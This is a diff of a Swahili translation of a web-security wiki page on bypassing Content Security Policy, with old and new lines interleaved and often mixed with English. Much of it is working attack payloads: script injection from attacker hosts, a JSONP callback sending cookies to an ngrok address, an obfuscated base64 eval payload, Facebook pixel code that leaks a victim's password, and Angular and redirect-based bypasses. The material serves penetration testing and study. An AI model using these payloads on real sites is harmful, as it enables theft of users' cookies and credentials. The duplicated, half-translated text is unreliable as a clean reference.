- **sandbox**: Inatekeleza vikwazo vinavyofanana na attribute ya sandbox ya `<iframe>`.
- **report-to**: Inaeleza kundi ambalo ripoti itatumwa ikiwa sera itavunjwa.
- **worker-src**: Inaeleza vyanzo halali kwa scripts za Worker, SharedWorker, au ServiceWorker.
- **prefetch-src**: Inaeleza vyanzo halali kwa rasilimali ambazo zitawekwa au kuprefetcha.
- **navigate-to**: Inazuia URLs ambazo dokumenti inaweza kusogea kwa njia yoyote (a, form, window.location, window.open, n.k.)
- **sandbox**: Inaweka vikwazo vinavyofanana na attribute ya sandbox ya `<iframe>`.
- **report-to**: Inabainisha kundi ambalo ripoti itatumwa kwa likitendeka kosa la sera.
- **worker-src**: Inabainisha vyanzo halali kwa Worker, SharedWorker, au ServiceWorker scripts.
- **prefetch-src**: Inabainisha vyanzo halali kwa rasilimali ambazo zitatamuliwa au kufahamishwa kabla.
- **navigate-to**: Inaweka kikomo kwa URLs ambazo hati inaweza kuvinjari kwa njia yoyote (a, form, window.location, window.open, nk.)
### Sources
### Vyanzo
- `*`: Inaruhusu URLs zote isipokuwa zile zenye schemes `data:`, `blob:`, `filesystem:`.
- `'self'`: Inaruhusu kupakia kutoka domain ile ile.
- `'data'`: Inaruhusu rasilimali kupakiwa kupitia data scheme (mfano, picha zilizoencoded kwa Base64).
- `'none'`: Inazuia upakiaji kutoka chanzo chochote.
- `'unsafe-eval'`: Inaruhusu matumizi ya `eval()` na mbinu zinazofanana, haitokiwi kwa sababu za usalama.
- `*`: Inaruhusu URLs zote isipokuwa zile zenye scheme `data:`, `blob:`, `filesystem:`.
- `'self'`: Inaruhusu kupakia kutoka domain ileile.
- `'data'`: Inaruhusu rasilimali kupakiwa kupitia data scheme (mfano, picha zilizofichwa kwa Base64).
- `'none'`: Inazuia kupakia kutoka kwa chanzo chochote.
- `'unsafe-eval'`: Inaruhusu matumizi ya `eval()` na mbinu zinazofanana, haipendekezwi kwa sababu za usalama.
- `'unsafe-hashes'`: Inawezesha event handlers maalum za inline.
- `'unsafe-inline'`: Inaruhusu matumizi ya rasilimali za inline kama `<script>` au `<style>` za inline, haitakiwa kwa sababu za usalama.
- `'nonce'`: Whitelist kwa scripts maalum za inline zinazotumia nonce ya kriptografia (nambari inayotumika mara moja).
- `'unsafe-inline'`: Inaruhusu matumizi ya rasilimali za inline kama `<script>` au `<style>` za inline, haipendekezwi kwa sababu za usalama.
- `'nonce'`: Orodha nyeupe kwa scripts maalum za inline zinazotumia nonce ya cryptographic (nambari inayotumika mara moja).
- If you have JS limited execution it's possible to get a used nonce inside the page with `doc.defaultView.top.document.querySelector("[nonce]")` and then reuse it to load a malicious script (if strict-dynamic is used, any allowed source can load new sources so this isn't needed), like in:
<details>
@ -88,18 +88,18 @@ b.nonce=a.nonce; doc.body.appendChild(b)' />
```
</details>
- `'sha256-<hash>'`: Inaweka scripts kwenye orodha nyeupe ambazo zina hash maalum ya sha256.
- `'strict-dynamic'`: Inaruhusu kupakia scripts kutoka chanzo chochote ikiwa zimewekwa kwenye orodha nyeupe kwa nonce au hash.
- `'host'`: Inaelekeza host maalum, kama `example.com`.
- `https:`: Inapunguza URLs kwa zile zinazotumia HTTPS.
- `blob:`: Inaruhusu rasilimali kupakiwa kutoka Blob URLs (kwa mfano, Blob URLs zilizotengenezwa kupitia JavaScript).
- `filesystem:`: Inaruhusu rasilimali kupakiwa kutoka filesystem.
- `'report-sample'`: Inajumuisha sampuli ya msimbo uliokiuka katika ripoti ya ukiukaji (inayosaidia debugging).
- `'strict-origin'`: Fanana na 'self' lakini inahakikisha ngazi ya usalama ya protocol ya vyanzo inalingana na nyaraka (tu origins salama zinaweza kupakia rasilimali kutoka origins salama).
- `'strict-origin-when-cross-origin'`: Inatuma URL kamili wakati wa kufanya maombi ya same-origin lakini inatuma tu origin wakati ombi ni cross-origin.
- `'unsafe-allow-redirects'`: Inaruhusu rasilimali kupakiwa ambazo zitatoa redirect mara moja kwa rasilimali nyingine. Haipendekezi kwani inapunguza usalama.
- `'sha256-<hash>'`: Inaweka scripts kwenye whitelist zilizo na sha256 hash maalum.
- `'strict-dynamic'`: Inaruhusu kupakia scripts kutoka kwa chanzo chochote ikiwa zimewekwa kwenye whitelist kwa kutumia nonce au hash.
- `'host'`: Inaelezea host maalum, kama `example.com`.
- `https:`: Inaruhusu tu URLs zinazotumia HTTPS.
- `blob:`: Inaruhusu resources kupakiwa kutoka Blob URLs (mfano, Blob URLs zilizoundwa kwa JavaScript).
- `filesystem:`: Inaruhusu resources kupakiwa kutoka filesystem.
- `'report-sample'`: Inajumuisha sampuli ya code inayokiuka katika ripoti ya ukiukaji (inayosaidia debugging).
- `'strict-origin'`: Inafanana na 'self' lakini ina hakikisha ngazi ya usalama ya protocol ya vyanzo inalingana na ile ya hati (tu secure origins zinaweza kupakia resources kutoka secure origins).
- `'strict-origin-when-cross-origin'`: Inatuma URLs kamili wakati wa maombi ya same-origin lakini inatuma tu origin wakati ombi ni cross-origin.
- `'unsafe-allow-redirects'`: Inaruhusu resources kupakiwa ambazo zitabadilisha mwelekeo mara moja kwenda resource nyingine. Haipendekezwi kwa kuwa inapunguza usalama.
## Sheria za CSP Zisizo Salama
## Kanuni za CSP zisizo salama
### 'unsafe-inline'
```yaml
@ -127,7 +127,7 @@ Payload inayofanya kazi:
```
### strict-dynamic
Ikiwa kwa namna fulani unaweza kusababisha **allowed JS code created a new script tag** kwenye DOM kwa kutumia JS yako, kwa sababu script iliyoruhusiwa ndiyo inayoiunda, basi **new script tag will be allowed to be executed**.
Ikiwa kwa njia yoyote unaweza kusababisha **JS iliyoruhusiwa kuunda tag mpya ya script** kwenye DOM kwa JS yako, kwa sababu script iliyoruhusiwa inaiunda, basi **tag mpya ya script itaruhusiwa kutekelezwa**.
### Wildcard (\*)
```yaml
@ -138,7 +138,7 @@ Payload inayofanya kazi:
"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
```
### Lack of object-src and default-src
### Kukosa object-src na default-src
> [!CAUTION] > **Inaonekana hii haifanyi kazi tena**
```yaml
@ -156,28 +156,28 @@ Content-Security-Policy: script-src 'self'; object-src 'none' ;
```
Ikiwa unaweza kupakia faili ya JS, unaweza bypass CSP hii:
Payload inayofanya kazi:
Working payload:
```html
"/>'><script src="/uploads/picture.png.js"></script>
```
Hata hivyo, kuna uwezekano mkubwa kwamba server inafanya **uthibitishaji wa faili zilizopakiwa** na itakuwezesha tu **kupakia aina maalum ya faili**.
However, it's highly probable that the server is **kukagua faili iliyopakiwa** and will only allow you to **kupakia aina maalum za faili**.
Zaidi ya hayo, hata kama unaweza kupakia **JS code inside** ndani ya faili ukitumia extension inayokubaliwa na server (k.m.: _script.png_) hilo haitoshi kwa sababu server zingine kama apache server **select MIME type of the file based on the extension** na browsers kama Chrome wata **reject to execute Javascript** code ndani ya kitu kinachotakiwa kuwa picha. "Hopefully", kuna makosa. Kwa mfano, kutoka CTF nilijifunza kwamba **Apache doesn't know** extension _**.wave**_, kwa hivyo haitoi nayo **MIME type like audio/***.
Moreover, even if you could upload a **JS code inside** a file using an extension accepted by the server (like: _script.png_) this won't be enough because some servers like apache server **select MIME type of the file based on the extension** and browsers like Chrome will **reject to execute Javascript** code inside something that should be an image. "Hopefully", there are mistakes. For example, from a CTF I learnt that **Apache doesn't know** the _**.wave**_ extension, therefore it doesn't serve it with a **MIME type like audio/***.
Kutoka hapa, ikiwa utapata XSS na upload ya faili, na utafanikiwa kupata **misinterpreted extension**, unaweza kujaribu kupakia faili lenye extension hiyo pamoja na content ya script. Au, ikiwa server inakagua muundo sahihi wa faili iliyopakuliwa, tengeneza polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)).
From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([mfano kadhaa za polyglot hapa](https://github.com/Polydet/polyglot-database)).
### Form-action
Ikiwa haiwezekani kuingiza JS, bado unaweza kujaribu exfiltrate kwa mfano credentials kwa **injecting a form action** (na labda kutegemea password managers kujaza nywila kiotomatiki). Unaweza kupata [**example in this report**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp). Pia, kumbuka kwamba `default-src` does not cover form actions.
If not possible to inject JS, you could still try to exfiltrate for example credentials **injecting a form action** (and maybe expecting password managers to auto-fill passwords). You can find an [**mfano katika ripoti hii**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp). Also, notice that `default-src` does not cover form actions.
### Third Party Endpoints + ('unsafe-eval')
> [!WARNING]
> Kwa baadhi ya payload zifuatazo, **`unsafe-eval` hata haihitajiki**.
> Kwa baadhi ya payload zifuatazo, **`unsafe-eval` haitahitajika hata**.
```yaml
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
```
Pakia toleo lenye udhaifu la angular na endesha JS yoyote:
Pakia toleo dhaifu la angular na utekeleze JS yoyote:
```xml
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
@ -198,10 +198,10 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>
```
#### Payloads zinazotumia Angular + library yenye functions zinazorejesha `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
#### Payloads zinazotumia Angular + maktaba yenye functions zinazorejesha `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
> [!TIP]
> Makala inaonyesha kwamba unaweza **load** zote **libraries** kutoka `cdn.cloudflare.com` (au repo nyingine yoyote ya JS libraries iliyoruhusiwa), kutekeleza functions zote zilizoongezwa kutoka kila library, na kuangalia **functions gani kutoka libraries gani zinarejesha `window` object**.
> Chapisho linaonyesha kuwa unaweza **kupakia** zote **maktaba** kutoka `cdn.cloudflare.com` (au repo nyingine yoyote ya JS libraries iliyoruhusiwa), endesha functions zote zilizoongezwa kutoka kila maktaba, na hakiki **ni functions gani kutoka maktaba gani zinazorudisha `window` objekti**.
```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
@ -233,7 +233,7 @@ Angular XSS kutoka kwa jina la darasa:
```
#### Kutumia vibaya google recaptcha JS code
Kulingana na [**this CTF writeup**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves) unaweza kutumia vibaya [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) ndani ya CSP ili kutekeleza JS code yoyote kupita kando ya CSP:
Kulingana na [**this CTF writeup**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves) unaweza kutumia vibaya [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) ndani ya CSP ili kutekeleza arbitrary JS code ukiepuka CSP:
```html
<div
ng-controller="CarouselController as c"
@ -244,7 +244,7 @@ ng-init="c.init()"
<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
```
Zaidi [**payloads kutoka kwenye writeup hii**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
Zaidi [**payloads from this writeup**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
```html
<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
@ -263,19 +263,19 @@ b.nonce=a.nonce; doc.body.appendChild(b)' />
```
#### Kutumia vibaya www.google.com kwa open redirect
URL ifuatayo inarudisha kwa example.com (kutoka [here](https://www.landh.tech/blog/20240304-google-hack-50000/)):
URL ifuatayo inaelekeza kwa example.com (from [here](https://www.landh.tech/blog/20240304-google-hack-50000/)):
```
https://www.google.com/amp/s/example.com/
```
Kutumia vibaya \*.google.com/script.google.com
Inawezekana kutumia vibaya Google Apps Script kupokea taarifa katika ukurasa ndani ya script.google.com. Kama ilivyofanywa katika [done in this report](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/).
Inawezekana kutumia vibaya Google Apps Script ili kupokea taarifa katika ukurasa ndani ya script.google.com. Kama ilivyofanywa katika [ripoti hii](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/).
### Endpoints za Wahusika wa Tatu + JSONP
### Endpoints za wahusika wa tatu + JSONP
```http
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
```
Mazingira kama haya ambapo `script-src` imewekwa kwa `self` na domain maalum iliyoorodheshwa inaweza kupitilizwa kwa kutumia JSONP. JSONP endpoints zinaruhusu njia za callback zisizo salama ambazo zinamruhusu mshambuliaji kufanya XSS, working payload:
Matukio kama haya ambapo `script-src` imewekwa kwa `self` na kikoa maalum kilicho kwenye orodha nyeupe kinaweza kupitishwa kwa kutumia JSONP. Endpoints za JSONP zinaruhusu njia za callback zisizo salama ambazo zinaweza kumruhusu mshambuliaji kutekeleza XSS, working payload:
```html
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
@ -289,15 +289,15 @@ https://www.youtube.com/oembed?callback=alert;
```html
<script type="text/javascript" crossorigin="anonymous" src="https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(%27KGZ1bmN0aW9uKCl7CiBsZXQgdnIgPSAoKT0%2Be3dpdGgobmV3IHRvcFsnVydbJ2NvbmNhdCddKCdlYicsJ1MnLCdjZycmJidvY2snfHwncGsnLCdldCcpXSgndydbJ2NvbmNhdCddKCdzcycsJzpkZWZkZWYnLCdsaScsJ3ZlY2hhdGknLCduYycsJy4nfHwnOycsJ25ldHdvcmtkZWZjaGF0cGlwZWRlZjAyOWRlZicpWydzcGxpdCddKCdkZWYnKVsnam9pbiddKCIvIikpKShvbm1lc3NhZ2U9KGUpPT5uZXcgRnVuY3Rpb24oYXRvYihlWydkYXRhJ10pKS5jYWxsKGVbJ3RhcmdldCddKSl9O25hdmlnYXRvclsnd2ViZHJpdmVyJ118fChsb2NhdGlvblsnaHJlZiddWydtYXRjaCddKCdjaGVja291dCcpJiZ2cigpKTsKfSkoKQ%3D%3D%27));"></script>
```
[**JSONBee**](https://github.com/zigoo0/JSONBee) **ina endpoints za JSONP tayari kwa CSP bypass ya tovuti mbalimbali.**
[**JSONBee**](https://github.com/zigoo0/JSONBee) **ina ready-to-use JSONP endpoints kwa CSP bypass ya tovuti mbalimbali.**
Udhaifu huo huo utatokea ikiwa **trusted endpoint contains an Open Redirect** kwa sababu ikiwa initial endpoint ni trusted, redirects pia ni trusted.
Udhaifu uleule utatokea ikiwa **trusted endpoint contains an Open Redirect** kwa sababu ikiwa initial endpoint imethibitishwa, redirects zinachukuliwa kuwa za kuaminika.
### Matumizi Mabaya ya Wahusika wa Tatu
Kama ilivyoelezwa katika [following post](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses), kuna domaini nyingi za pihak tatu ambazo zinaweza kuruhusiwa sehemu fulani ya CSP na zinaweza kutumiwa vibaya ili exfiltrate data au execute JavaScript code. Baadhi ya pihak tatu hizi ni:
Kama ilivyoelezwa katika [following post](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses), kuna domain nyingi za third-party ambazo zinaweza kuruhusiwa mahali fulani katika CSP, na zinaweza kutumiwa vibaya ili exfiltrate data au execute JavaScript code. Baadhi ya third-parties ni:
| Shirika | Domaini Zilizoruhusiwa | Uwezo |
| Chombo | Domain Zinaruhusiwa | Uwezo |
| ----------------- | -------------------------------------------- | ----------- |
| Facebook | www.facebook.com, \*.facebook.com | Exfil |
| Hotjar | \*.hotjar.com, ask.hotjar.io | Exfil |
@ -308,7 +308,7 @@ Kama ilivyoelezwa katika [following post](https://sensepost.com/blog/2023/dress-
| Salesforce Heroku | \*.herokuapp.com | Exfil, Exec |
| Google Firebase | \*.firebaseapp.com | Exfil, Exec |
Ikiwa utapata moja ya domaini zilizoruhusiwa katika CSP ya target yako, kuna uwezekano kwamba unaweza bypass CSP kwa kujisajili kwenye huduma ya pihak tatu na, ama exfiltrate data kwa huduma hiyo au execute code.
Ikiwa utapata yoyote ya domain zilizo ruhusiwa katika CSP ya lengo lako, kuna uwezekano kwamba unaweza bypass CSP kwa kujisajili kwenye third-party service na, ama exfiltrate data kwa huduma hiyo au execute code.
Kwa mfano, ikiwa utapata CSP ifuatayo:
```
@ -318,80 +318,80 @@ au
```
Content-Security-Policy: connect-src www.facebook.com;
```
Unapaswa kuweza exfiltrate data, kwa namna ile ile kama imekuwa ikifanywa na [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/). Katika kesi hii, fuata hatua hizi za jumla:
Unapaswa kuwa na uwezo wa exfiltrate data, similarly as it has always be done with [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/). Katika kesi hii, fuata hatua hizi za jumla:
1. Unda akaunti ya Facebook Developer hapa.
2. Tengeneza app mpya ya "Facebook Login" na chagua "Website".
3. Nenda kwenye "Settings -> Basic" na upate "App ID" yako.
4. Kwenye tovuti lengwa unayotaka exfiltrate data kutoka, unaweza exfiltrate data kwa kutumia moja kwa moja Facebook SDK gadget "fbq" kupitia "customEvent" na data payload.
5. Nenda kwenye App yako "Event Manager" na chagua application uliyotengeneza (note the event manager could be found in an URL similar to this: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events
6. Chagua tab "Test Events" kuona events zinazotumwa na "your" web site.
1. Create a Facebook Developer account hapa.
2. Create a new "Facebook Login" app and select "Website".
3. Nenda kwenye "Settings -> Basic" na pata "App ID" yako
4. Kwenye target site unayotaka ku-exfiltrate data kutoka, unaweza exfiltrate data kwa kutumia moja kwa moja Facebook SDK gadget "fbq" kupitia "customEvent" na data payload.
5. Nenda kwenye App yako "Event Manager" na chagua application uliyotengeneza (kumbuka event manager inaweza kupatikana katika URL inayofanana na hii: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events
6. Chagua tab "Test Events" ili kuona events zinazotumwa na "your" web site.
Kisha, kwa upande wa victim, utekeleze code ifuatayo ili kuanzisha Facebook tracking pixel kuelekeza kwenye attacker's Facebook developer account app-id na kutoa custom event kama ifuatavyo:
Then, on the victim side, you execute the following code to initialize the Facebook tracking pixel to point to the attacker's Facebook developer account app-id and issue a custom event like this:
```JavaScript
fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});
```
Kuhusu domain nyingine saba za third-party zilizotajwa kwenye jedwali hapo awali, kuna njia nyingi zaidi za kuzitumia vibaya. Rejea alipokuwa [blog post](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) kwa maelezo ya ziada kuhusu matumizi mabaya mengine ya third-party.
Kuhusu yale mengine saba third-party domains yaliyotajwa katika jedwali lililopita, kuna njia nyingi zaidi unazoweza kuzitumia vibaya. Refer to the previously [blog post](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) for additional explanations about other third-party abuses.
### Kupitia RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
### Bypass via RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
Mbali na ule uelekezaji uliotajwa hapo juu wa kupitisha vikwazo vya path, kuna mbinu nyingine inayoitwa Relative Path Overwrite (RPO) inayoweza kutumika kwenye servers fulani.
Mbali na redirection iliyotajwa hapo juu ili bypass path restrictions, kuna mbinu nyingine inayoitwa Relative Path Overwrite (RPO) ambayo inaweza kutumika kwenye servers fulani.
Kwa mfano, ikiwa CSP inaruhusu path `https://example.com/scripts/react/`, inaweza kupitishwa kama ifuatavyo:
Kwa mfano, kama CSP inaruhusu path `https://example.com/scripts/react/`, inaweza kupitishwa kama ifuatavyo:
```html
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
```
Kivinjari hatimaye kitapakia `https://example.com/scripts/angular/angular.js`.
The browser will ultimately load `https://example.com/scripts/angular/angular.js`.
Hii inafanya kazi kwa sababu kwa upande wa kivinjari, unapakia faili iliyoitwa `..%2fangular%2fangular.js` iliyoko chini ya `https://example.com/scripts/react/`, ambayo inakubaliana na CSP.
Hii inafanya kazi kwa sababu kwa upande wa kivinjari, unapakia faili yenye jina `..%2fangular%2fangular.js` iliyo chini ya `https://example.com/scripts/react/`, ambayo inakubaliana na CSP.
∑, zitatafsiri, na kwa ufanisi zitafanya ombi la `https://example.com/scripts/react/../angular/angular.js`, ambalo ni sawa na `https://example.com/scripts/angular/angular.js`.
∑, kivinjari kitabadilisha msimbo huo (decode), na kwa hivyo kitaomba `https://example.com/scripts/react/../angular/angular.js`, ambayo ni sawa na `https://example.com/scripts/angular/angular.js`.
Kwa **kuita faida ukosefu huu wa muafaka katika tafsiri ya URL kati ya kivinjari na server, kanuni za path zinaweza kuepukwa**.
Kwa **kuitumia utofauti huu wa tafsiri ya URL kati ya kivinjari na server, kanuni za path zinaweza kupitilizwa**.
Suluhisho ni kutotumia `%2f` kama `/` upande wa server, kuhakikisha tafsiri sawa kati ya kivinjari na server ili kuepuka tatizo hili.
Suluhisho ni kutofanya `%2f` kama `/` upande wa server, kuhakikisha tafsiri ndogo kati ya kivinjari na server ili kuepuka tatizo hili.
Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
### Utekelezaji wa JS katika Iframes
### Utekelezaji wa JS kwenye Iframes
{{#ref}}
../xss-cross-site-scripting/iframes-in-xss-and-csp.md
{{#endref}}
### **base-uri** inakosekana
### Kukosa **base-uri**
Ikiwa diretivu ya **base-uri** inakosekana unaweza kuitumia vibaya kufanya [**dangling markup injection**](../dangling-markup-html-scriptless-injection/index.html).
Kama directive ya **base-uri** haipo unaweza kuitumia vibaya kufanya [**dangling markup injection**](../dangling-markup-html-scriptless-injection/index.html).
Zaidi ya hayo, ikiwa **ukurasa unapakia script kwa kutumia relative path** (like `<script src="/js/app.js">`) ukitumia **Nonce**, unaweza kutumia vibaya **base** **tag** ili kuifanya **load** script kutoka **server yako mwenyewe ukifanikisha XSS.**\
Kama ukurasa unaoathirika unapakiwa kwa **httpS**, tumia URL ya **httpS** katika base.
Zaidi ya hayo, ikiwa **ukurasa unapakia script kwa kutumia relative path** (kama `<script src="/js/app.js">`) ukitumia **Nonce**, unaweza kuitumia vibaya **base** **tag** ili kuifanya i**load** script kutoka **seva yako mwenyewe kufanikisha XSS.**\
Ikiwa ukurasa wenye udhaifu unapakiwa kwa **httpS**, tumia URL ya httpS katika base.
```html
<base href="https://www.attacker.com/" />
```
### Matukio ya AngularJS
### AngularJS matukio
Sera maalum inayojulikana kama Content Security Policy (CSP) inaweza kuweka vizingiti kwa matukio ya JavaScript. Hata hivyo, AngularJS inatoa matukio maalum kama mbadala. Ndani ya tukio, AngularJS hutoa object ya kipekee `$event`, inayorejea kwenye native browser event object. Object `$event` inaweza kutumiwa kuzunguka CSP. Kwa mfano, katika Chrome, object `$event/event` ina sifa `path`, inayoshikilia array ya object zilizohusika katika mnyororo wa utekelezaji wa tukio, na object `window` mara zote ikipangwa mwisho. Muundo huu ni muhimu kwa mbinu za kutoroka sandbox.
Sera maalum inayojulikana kama Content Security Policy (CSP) inaweza kuzuia matukio ya JavaScript. Hata hivyo, AngularJS inaleta matukio maalum kama mbadala. Katika tukio, AngularJS hutoa kipengele cha kipekee `$event`, kinachorejea kwenye native browser event object. Kipengele hiki `$event` kinaweza kutumiwa kuzunguka CSP. Kwa mfano, kwenye Chrome, kitu `$event/event` kina sifa `path`, inayoshikilia array ya objects inayohusika katika mnyororo wa utekelezaji wa tukio, ambapo `window` daima iko mwishoni. Muundo huu ni muhimu kwa sandbox escape tactics.
Kwa kupeleka array hii kwenye filter ya `orderBy`, inawezekana kuzunguka juu yake, ukaitegemea element ya mwisho (object `window`) kutekeleza global function kama `alert()`. Snippet ya code iliyooneshwa hapa chini inaelezea mchakato huu:
Kwa kuielekeza array hii kwenye filter ya `orderBy`, inawezekana kuitereta juu yake, ukitumia kipengele cha mwisho (kitu `window`) kuanzisha global function kama `alert()`. Snippet ya code iliyoonyeshwa hapa chini inaelezea mchakato huu:
```xml
<input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
```
Kiibukizo hiki kinaonyesha matumizi ya directive ya `ng-focus` kusababisha tukio, kutumia `$event.path|orderBy` kuendesha array ya `path`, na kutumia object ya `window` kutekeleza `alert()` na hivyo kufichua `document.cookie`.
Kipande hiki kinaangazia matumizi ya directive ya `ng-focus` kuzusha tukio, ikitumia `$event.path|orderBy` kurekebisha array ya `path`, na kutumia object ya `window` kutekeleza `alert()` na hivyo kufichua `document.cookie`.
**Tafuta Angular bypasses nyingine kwenye** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
**Pata bypasses nyingine za Angular katika** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
### AngularJS na whitelisted domain
```
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
```
Sera ya CSP ambayo inaweka whitelist ya domains kwa ajili ya script loading katika application ya Angular JS inaweza kupitishwa kwa uitoaji wa callback functions na baadhi ya vulnerable classes. Taarifa zaidi kuhusu mbinu hii zinaweza kupatikana katika mwongozo wa kina uliopo kwenye [git repository](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22).
Sera ya CSP inayoorodhesha domains kwa ajili ya upakiaji wa script katika application ya Angular JS inaweza kupitishwa kupitia kuamshwa kwa callback functions na baadhi ya classes zilizo na udhaifu. Maelezo zaidi juu ya mbinu hii yanaweza kupatikana katika mwongozo wa kina uliopo kwenye [git repository](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22).
Payloads zinazofanya kazi:
Working payloads:
```html
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
@ -399,13 +399,13 @@ ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com
<!-- no longer working -->
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
```
Endpoints nyingine za JSONP za arbitrary execution zinaweza kupatikana [**here**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) (baadhi yao zilifutwa au kurekebishwa)
Other JSONP arbitrary execution endpoints can be found in [**here**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) (baadhi yao zilitoweka au zilirekebishwa)
### Kupita kupitia Uelekezaji
### Bypass via Redirection
Nini kinatokea wakati CSP inakutana na uelekezaji upande wa seva? Ikiwa uelekezaji unasababisha origin tofauti ambayo haijaruhusiwa, bado itashindwa.
Nini hutokea wakati CSP inakutana na urejeeshaji upande wa server? Ikiwa urejeeshaji unaelekeza kwa origin tofauti ambayo haijaruhusiwa, bado utashindwa.
Hata hivyo, kwa mujibu wa maelezo katika [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects), ikiwa uelekezaji unasababisha njia tofauti, unaweza kupitisha vikwazo vya asili.
Hata hivyo, kwa mujibu wa maelezo katika [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects), ikiwa urejeeshaji unaelekeza kwa njia tofauti, unaweza kupitisha vikwazo vya awali.
Hapa kuna mfano:
```html
@ -425,38 +425,38 @@ content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" />
</body>
</html>
```
If CSP is set to `https://www.google.com/a/b/c/d`, since the path is considered, both `/test` and `/a/test` scripts will be blocked by CSP.
Ikiwa CSP imewekwa kwa `https://www.google.com/a/b/c/d`, kwa kuwa path inazingatiwa, scripts `/test` na `/a/test` zitazuiwa na CSP.
However, the final `http://localhost:5555/301` will be **redirected on the server-side to `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**. Since it is a redirection, the **path is not considered**, and the **script can be loaded**, thus bypassing the path restriction.
Hata hivyo, `http://localhost:5555/301` ita **pelekwa upande wa server hadi `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**. Kwa kuwa ni redirection, **path haizingatiwi**, na **script inaweza kupakiwa**, hivyo kupitisha kikomo la path.
With this redirection, even if the path is specified completely, it will still be bypassed.
